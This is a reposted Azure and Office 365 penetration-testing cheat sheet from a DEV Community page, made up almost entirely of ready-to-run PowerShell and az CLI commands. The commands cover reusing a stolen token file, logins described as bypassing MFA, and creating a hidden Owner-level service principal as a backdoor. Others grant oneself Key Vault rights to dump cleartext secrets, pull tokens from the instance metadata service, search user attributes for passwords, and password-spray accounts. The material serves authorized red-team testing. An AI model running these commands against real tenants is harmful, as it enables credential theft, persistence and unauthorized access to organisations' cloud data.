DEV Community

Eng Soon Cheah

Azure Penetration Testing Cheat sheet

Microsoft Azure & O365 CLI Tool Cheatsheet

By Beau Bullock (@dafthack)

Az PowerShell Module

Import-Module Az

Authentication

Connect-AzAccount

## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-AzAccount -Credential $credential

Import a context file

Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'

Export a context file

Save-AzContext -Path C:\Temp\AzureAccessToken.json

Account Information

List the current Azure contexts available

Get-AzContext -ListAvailable

Get context details

$context = Get-AzContext
$context.Name
$context.Account

List subscriptions

Get-AzSubscription

Choose a subscription

Select-AzSubscription -SubscriptionID "SubscriptionID"

Get the current user's role assignment

Get-AzRoleAssignment

List all resources and resource groups

Get-AzResource
Get-AzResourceGroup

List storage accounts

Get-AzStorageAccount

WebApps & SQL

List Azure web applications

Get-AzAdApplication
Get-AzWebApp

List SQL servers

Get-AzSQLServer

Individual databases can be listed with information retrieved from the previous command

Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName

List SQL Firewall rules

Get-AzSqlServerFirewallRule -ServerName $ServerName -ResourceGroupName $ResourceGroupName

List SQL Server AD Admins

Get-AzSqlServerActiveDirectoryAdministrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName

Runbooks

List Azure Runbooks

Get-AzAutomationAccount
Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>

Export a runbook with:

Export-AzAutomationRunbook -AutomationAccountName $AccountName -ResourceGroupName $ResourceGroupName -Name $RunbookName -OutputFolder .\Desktop\

Virtual Machines

List VMs and get OS details

Get-AzVM
$vm = Get-AzVM -Name "VM Name"
$vm.OSProfile

Run commands on VMs

Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1

Networking

List virtual networks

Get-AzVirtualNetwork

List public IP addresses assigned to virtual NICs

Get-AzPublicIpAddress

Get Azure ExpressRoute (VPN) Info

Get-AzExpressRouteCircuit

Backdoors

Create a new Azure service principal as a backdoor

$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$spn
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$UnsecureSecret
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
#Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant "tenantID" -ServicePrincipal

MSOnline PowerShell Module

Import-Module MSOnline

Authentication

Connect-MsolService

## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-MsolService -Credential $credential

Account and Directory Information

List Company Information

Get-MSolCompanyInformation

List all users

Get-MSolUser -All

List all groups

Get-MSolGroup -All

List members of a group (Global Admins in this case)

Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember -GroupObjectId $GUID

List all user attributes

Get-MSolUser -All | fl

List Service Principals

Get-MsolServicePrincipal

One-liner to search all Azure AD user attributes for passwords

$users = Get-MsolUser; foreach($user in $users){$props = @(); $user | Get-Member | foreach-object{$props += $_.Name}; foreach($prop in $props){if($user.$prop -like "*password*"){Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)}}}

Az CLI Tool

Authentication

az login

Dump Azure Key Vaults

List out any key vault resources the current account can view

az keyvault list --query '[].name' --output tsv

With contributor level access you can give yourself the right permissions to obtain secrets.

az keyvault set-policy --name <KeyVaultname> --upn <YourContributorUsername> --secret-permissions get list --key-permissions get list --storage-permissions get list --certificate-permissions get list

Get URI for Key Vault

az keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv

Get cleartext secret from keyvault

az keyvault secret show --id <URI from last command> | ConvertFrom-Json

Metadata Service URL

http://169.254.169.254/metadata

Get access tokens from the metadata service

GET 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' HTTP/1.1 Metadata: true

Other Azure & O365 Tools

MicroBurst

Azure security assessment tool

https://github.com/NetSPI/MicroBurst

Look for open storage blobs

Invoke-EnumerateAzureBlobs -Base $BaseName

Export SSL/TLS certs

Get-AzPasswords -ExportCerts Y

Azure Container Registry dump

Get-AzPasswords
Get-AzACR

PowerZure

Azure security assessment tool

https://github.com/hausec/PowerZure

ROADTools

Framework to interact with Azure AD

https://github.com/dirkjanm/ROADtools

Stormspotter

Red team tool for graphing Azure and Azure AD objects

https://github.com/Azure/Stormspotter

MSOLSpray

Tool to password spray Azure/O365

https://github.com/dafthack

Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020

Top comments (1)

lewisblakeney

Penetration testing companies can provide you with the expertise and resources you need to test your Azure environment and identify any security vulnerabilities. They will work with you to develop a custom testing plan that meets your specific needs and budget.
